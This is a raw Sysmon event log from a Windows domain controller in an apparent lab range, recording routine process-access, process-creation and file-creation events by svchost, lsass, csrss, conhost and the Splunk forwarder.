12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.033{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.036{266CAFBE-6482-6064-6200-00000000AE01}4020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.033{266CAFBE-647D-6064-2F00-00000000AE01}2796NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\pre-flight-checksMD5=52414E13BC571139A78F09588A1364A4,SHA256=3C1F79227940F5C563684E97F96860594D7E76089653064CB910620CB735929B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.002{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.002{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.002{266CAFBE-6481-6064-5F00-00000000AE01}30242732C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.283{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 